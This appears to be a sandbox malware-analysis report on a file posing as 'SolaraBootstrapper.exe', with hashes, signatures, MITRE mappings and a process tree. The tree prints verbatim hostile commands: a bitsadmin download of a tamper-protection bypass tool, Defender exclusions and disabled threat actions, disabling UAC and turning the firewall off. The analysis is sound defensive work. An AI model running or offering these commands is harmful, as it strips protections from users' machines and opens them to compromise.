Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 10/07/2024, 12:27

Static task: static1
Behavioral task: behavioral1
  Sample: SolaraBootstrapper.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: SolaraBootstrapper.exe
  Resource: win10v2004-20240709-en
General
Target: SolaraBootstrapper.exe
Size: 715KB
MD5: f76e6a62661fdf7181a0072479b2f7c7
SHA1: bd4995f5d5d39931cec7bdf7872c89ca1c98b5d0
SHA256: f74f54580d6be2be3245755cd960e61a29f0b0766e3eec827cb2909d6c768801
SHA512: 526e948cffaacaa6caa9313d28bdf8b726a40d863a6b6021482497b7c121ed830141cdcc3128d08122d9e50ab39fc4a0ff6475640ea0790c3b099ed829f310b9
SSDEEP: 12288:gPwNKpOkwyszkgmBaPeMpAqrepwBWP3pwdDT6ulrGQ+Sf4JRZbsGOsyr4Fzi5:gPwAkkEzkgyaPhKpNPSDT6ulGtR6eFz
Malware Config

Signatures

UAC bypass
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 11 IoCs)
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  2136 | powershell.exe
  1424 | powershell.exe
  1856 | powershell.exe
  1664 | powershell.exe
  2872 | powershell.exe
  2656 | powershell.exe
  1896 | powershell.exe
  880 | powershell.exe
  2396 | powershell.exe
  2100 | powershell.exe
  2264 | powershell.exe

Modifies Windows Firewall (2 TTPs, 1 IoCs)
  pid | Process
  1352 | netsh.exe

Executes dropped EXE (1 IoCs)
  pid | Process
  2816 | Solara.exe

Loads dropped DLL (2 IoCs)
  pid | Process
  2648 | SolaraBootstrapper.exe
  2648 | SolaraBootstrapper.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  2 | raw.githubusercontent.com
  3 | raw.githubusercontent.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe

Download via BitsAdmin (1 TTPs, 1 IoCs)
  pid | Process
  2576 | bitsadmin.exe

Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid | Process
  2136 | powershell.exe
  1424 | powershell.exe
  1508 | powershell.exe
  2872 | powershell.exe
  2656 | powershell.exe
  1896 | powershell.exe
  880 | powershell.exe
  2396 | powershell.exe
  2100 | powershell.exe
  2264 | powershell.exe
  1664 | powershell.exe
  1856 | powershell.exe

Suspicious use of AdjustPrivilegeToken (12 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2136 | powershell.exe
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeDebugPrivilege | 1508 | powershell.exe
  Token: SeDebugPrivilege | 2872 | powershell.exe
  Token: SeDebugPrivilege | 2656 | powershell.exe
  Token: SeDebugPrivilege | 1896 | powershell.exe
  Token: SeDebugPrivilege | 880 | powershell.exe
  Token: SeDebugPrivilege | 2396 | powershell.exe
  Token: SeDebugPrivilege | 2100 | powershell.exe
  Token: SeDebugPrivilege | 2264 | powershell.exe
  Token: SeDebugPrivilege | 1664 | powershell.exe
  Token: SeDebugPrivilege | 1856 | powershell.exe

Suspicious use of WriteProcessMemory (55 IoCs)
  description | pid | Process | procid_target
  PID 2648 wrote to memory of 2816 | 2648 | SolaraBootstrapper.exe | 30
  PID 2648 wrote to memory of 2816 | 2648 | SolaraBootstrapper.exe | 30
  PID 2648 wrote to memory of 2816 | 2648 | SolaraBootstrapper.exe | 30
  PID 2648 wrote to memory of 2816 | 2648 | SolaraBootstrapper.exe | 30
  PID 2816 wrote to memory of 2764 | 2816 | Solara.exe | 31
  PID 2816 wrote to memory of 2764 | 2816 | Solara.exe | 31
  PID 2816 wrote to memory of 2764 | 2816 | Solara.exe | 31
  PID 2764 wrote to memory of 2444 | 2764 | cmd.exe | 33
  PID 2764 wrote to memory of 2444 | 2764 | cmd.exe | 33
  PID 2764 wrote to memory of 2444 | 2764 | cmd.exe | 33
  PID 2764 wrote to memory of 2856 | 2764 | cmd.exe | 34
  PID 2764 wrote to memory of 2856 | 2764 | cmd.exe | 34
  PID 2764 wrote to memory of 2856 | 2764 | cmd.exe | 34
  PID 2764 wrote to memory of 2576 | 2764 | cmd.exe | 35
  PID 2764 wrote to memory of 2576 | 2764 | cmd.exe | 35
  PID 2764 wrote to memory of 2576 | 2764 | cmd.exe | 35
  PID 2764 wrote to memory of 2136 | 2764 | cmd.exe | 36
  PID 2764 wrote to memory of 2136 | 2764 | cmd.exe | 36
  PID 2764 wrote to memory of 2136 | 2764 | cmd.exe | 36
  PID 2764 wrote to memory of 1424 | 2764 | cmd.exe | 37
  PID 2764 wrote to memory of 1424 | 2764 | cmd.exe | 37
  PID 2764 wrote to memory of 1424 | 2764 | cmd.exe | 37
  PID 2764 wrote to memory of 1508 | 2764 | cmd.exe | 38
  PID 2764 wrote to memory of 1508 | 2764 | cmd.exe | 38
  PID 2764 wrote to memory of 1508 | 2764 | cmd.exe | 38
  PID 2764 wrote to memory of 2872 | 2764 | cmd.exe | 39
  PID 2764 wrote to memory of 2872 | 2764 | cmd.exe | 39
  PID 2764 wrote to memory of 2872 | 2764 | cmd.exe | 39
  PID 2764 wrote to memory of 2656 | 2764 | cmd.exe | 40
  PID 2764 wrote to memory of 2656 | 2764 | cmd.exe | 40
  PID 2764 wrote to memory of 2656 | 2764 | cmd.exe | 40
  PID 2764 wrote to memory of 1896 | 2764 | cmd.exe | 41
  PID 2764 wrote to memory of 1896 | 2764 | cmd.exe | 41
  PID 2764 wrote to memory of 1896 | 2764 | cmd.exe | 41
  PID 2764 wrote to memory of 880 | 2764 | cmd.exe | 42
  PID 2764 wrote to memory of 880 | 2764 | cmd.exe | 42
  PID 2764 wrote to memory of 880 | 2764 | cmd.exe | 42
  PID 2764 wrote to memory of 2396 | 2764 | cmd.exe | 43
  PID 2764 wrote to memory of 2396 | 2764 | cmd.exe | 43
  PID 2764 wrote to memory of 2396 | 2764 | cmd.exe | 43
  PID 2764 wrote to memory of 2100 | 2764 | cmd.exe | 44
  PID 2764 wrote to memory of 2100 | 2764 | cmd.exe | 44
  PID 2764 wrote to memory of 2100 | 2764 | cmd.exe | 44
  PID 2764 wrote to memory of 2264 | 2764 | cmd.exe | 45
  PID 2764 wrote to memory of 2264 | 2764 | cmd.exe | 45
  PID 2764 wrote to memory of 2264 | 2764 | cmd.exe | 45
  PID 2764 wrote to memory of 1664 | 2764 | cmd.exe | 46
  PID 2764 wrote to memory of 1664 | 2764 | cmd.exe | 46
  PID 2764 wrote to memory of 1664 | 2764 | cmd.exe | 46
  PID 1664 wrote to memory of 1352 | 1664 | powershell.exe | 47
  PID 1664 wrote to memory of 1352 | 1664 | powershell.exe | 47
  PID 1664 wrote to memory of 1352 | 1664 | powershell.exe | 47
  PID 2764 wrote to memory of 1856 | 2764 | cmd.exe | 48
  PID 2764 wrote to memory of 1856 | 2764 | cmd.exe | 48
  PID 2764 wrote to memory of 1856 | 2764 | cmd.exe | 48
Processes

[1] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 2648

  [2] C:\Users\Admin\AppData\Local\Temp\Solara.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 2816

    [3] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        - Suspicious use of WriteProcessMemory
        PID: 2764

      [4] C:\Windows\system32\cacls.exe
          Command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
          PID: 2444

      [4] C:\Windows\system32\wscript.exe
          Command line: wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
          PID: 2856

      [4] C:\Windows\system32\bitsadmin.exe
          Command line: bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          - Download via BitsAdmin
          PID: 2576

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2136

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1424

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          - UAC bypass
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1508

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2872

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -PUAProtection disable"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2656

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1896

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 880

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2396

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2100

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2264

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "netsh advfirewall set allprofiles state off"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 1664

        [5] C:\Windows\system32\netsh.exe
            Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID: 1352

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -command "Add-MpPreference -ExclusionExtension "Solara.exe""
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1856
MITRE ATT&CK Enterprise v15

Persistence
- BITS Jobs (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Downloads

Filesize: 3KB
MD5: ca8c6adbbd6da2a4a498fa35426ec982
SHA1: 09e3d8616a6bfa8a5999324e6686139027acfb81
SHA256: ebb973dfe87b50bf8344ea291272ee1590f382a5735f92a56b8ef6d3d30fcf5c
SHA512: 72520a8c8d61cd02469448c02017c2a3b039fb045358512a0a8cb8f2bd90fb46c5ac6027f88a6bab87d5ca1a96445809459ef18035bf32df246230d39d2b72b0

Filesize: 112B
MD5: 9313d55e26ad30ddcbc046fe8013a21d
SHA1: a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256: 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512: 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: de015ba5b82c0761db0f20dfa78e1535
SHA1: 6cddb53932f20d49aef44dd01657f0b980cdb5aa
SHA256: 37ad9b7f9a23a02db5c4c92be82704ec52abd7fbdf7b9ce194e9a77fd3069bd7
SHA512: d6c69a7f7b313d7e62150a4233be291e2f62b40a5486a1c74dd301f2e80e839c3915263ca33e3aafdb50bf4c2d61ea5487d3f758794d058728ba94aab7a5efd4

Filesize: 123KB
MD5: 97c55dabe9a79cd79f28c956776f7419
SHA1: 1d24c86f2c31d8a099573e57e508aead646a1fce
SHA256: 16f593cacbe6af31b0ec10b285bed89efb1b270f6bb29ec05fc98237f0194913
SHA512: 1d26d2bcd410bc34e3a5e20562084423a143fd1d758ce28ed7841c9a15acba4425a8790b1357f722bad7200204a199e3830e9ab21343b8d72b0f7d4e5f523e8b